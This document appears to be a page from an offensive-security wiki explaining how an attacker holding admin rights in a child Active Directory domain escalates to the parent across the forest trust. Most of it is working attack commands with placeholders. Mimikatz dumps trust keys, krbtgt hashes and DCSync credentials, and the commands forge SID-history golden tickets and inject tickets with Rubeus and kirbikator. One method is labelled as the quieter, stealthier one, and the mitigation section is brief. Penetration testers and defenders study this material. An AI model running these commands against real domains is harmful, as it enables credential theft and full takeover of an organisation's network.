Child to Parent Movement Across Trusts

Domains that are in the same forest have an explicit two way trust between them. Between parent and child domains there are trust keys that can be used to move elsewhere within the forest.

The are two ways to take advantage of this:

Using Trust Tickets
Using krgtbt

If we are able to obtain a single Domain Admin, the trust of the entire forest would be at risk because we would now be able to move anywhere.

The attack is very similar to forging Silver or Golden Tickets. However, we must obtain the trust key, or the password shared between the two domains that maintains the trust.

Authentication is very similar to the average Kerberos authentication. The difference is that an extra step is taken to authenticate to the KDC on the other domain. This must occur because KDCs cannot grant TGSs to other domains. The target services credentials necessary to create tickets on the other domain are stored in the other domains DC.

The trust key becomes something like a middleman which allows the user to request a TGS on the other domain. It is this key which is encrypted into the TGT before the TGS request to the next domain is made instead of the DC's krbtgt password.

If there are more than two domains in a forest, the authentication procedure gets more complicated depending on the trust relationships within the forest.

Using Trust Tickets to Move Laterally

Step 1

To forge these tickets, we need the trust key. So we must find that first. This will require Admin privileges.

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName <dc>

# If you have the computer name of the parent, you could also use that since the NTLM hash of the parent DC is the trust key
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<current_domain>\<parent_DC_machine_account>"'

Step 2

Now that we have the trust key, we can forge an Inter-Realm TGT (doesn't require Admin privileges). However, we first need the Enterprise Admins SID

# PowerView
Get-NetGroup -Domain <parent_domain> -FullData | select samaccountname,objectsid | | ?{$_.samaccountname -match "Enterprise Admins"}

Step 3

Now we can forge the Inter-Realm TGT

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<current_domain> /sid:<domain_SID> /sids:<enterprise_admin_SID> /rc4:<trust_key> /service:krbtgt /target:<parent_domain> /ticket:C:\path\to\new\ticket.kirbi"'

Step 4

And then forge a TGS to the parent

# asktgs.exe
asktgs.exe <trust_ticket.kirbi> <service>/<parent_domain>
# example
asktgs.exe .\trust_ticket1.kirbi CIFS/parentDC.bizcorp.local

Step 5

Then we can inject the ticket created from the last step

# kirbikator.exe
kirbikator.exe lsa .\<service_ticket_to_parent.kirbi>

Step 6

Now check our access to the parent

# If CIFS...
ls \\parent.DC\C$
# If WMI
Get-WmiObject Win32_Processor -ComputerName <parent.dc>

Steps 4 and 5 Can Also Be Done with Rubeus.exe

.\Rubeus.exe asktgs /ticket:<TGT_trust_ticket.kirbi> /service:<service>/<parent_DC> /dc:<parent_DC> /ptt

Using krbtgt to Move Laterally

Method 1 - Abusing SID History to Escalate to Enterprise Admin

Step 1 - Make Sure You Have the krbtgt Hash

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

Step 2 - Create an Inter Realm TGT

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<current_domain> /sid:<current_domain_sid> /sids:<parent_enterprise_admin_sid> /krbtgt:<krbtgt_hash> /ticket:C:\path\to\ticket.kirbi"'

Step 3 - Inject the Ticket

Invoke-Mimikatz -Command '"kerberos::ptt C:\path\to\ticket.kirbi"'

Step 4 - Check the Injection

ls \\<parent_DC>\C$

Method 2 - The Quieter Way, Using the Domain Controllers' SID and Enterprise Domain Controllers SID

First, get the parent Domain Controllers SID

Get-NetGroup -Domain <parent_domain> -FullData | select samaccountname,objectsid | ?{$_.samaccountname -eq "Domain Controllers"}

Then create the ticket

Invoke-Mimikatz -Command '"kerberos::golden /user:<current_DC_machine_account> /domain:<current_domain> /sid:<current_domain_sid> /groups:516 /sids:<parent_DC_sid>,S-1-5-9 /krbtgt:<krbtgt_hash> /ptt"'

Now you can DCSync to get the parent DC Administrator hash

Invoke-Mimikatz -Command '"lsadump::dcsync /user:<parent_domain>\Administrator /domain:<parent_domain>"'

Mitigations

Since intra-forest trusts are considered by default to be secure there is no real effective defense mechanism.

What can be done is to change the machine account passwords often in order to reduce persistence within the network. However, the best thing to do is protect the domain controller from any outside intrusion or code execution.

PreviousLateral Movement NextTrust Abuse Between Forests

Last updated 2 years ago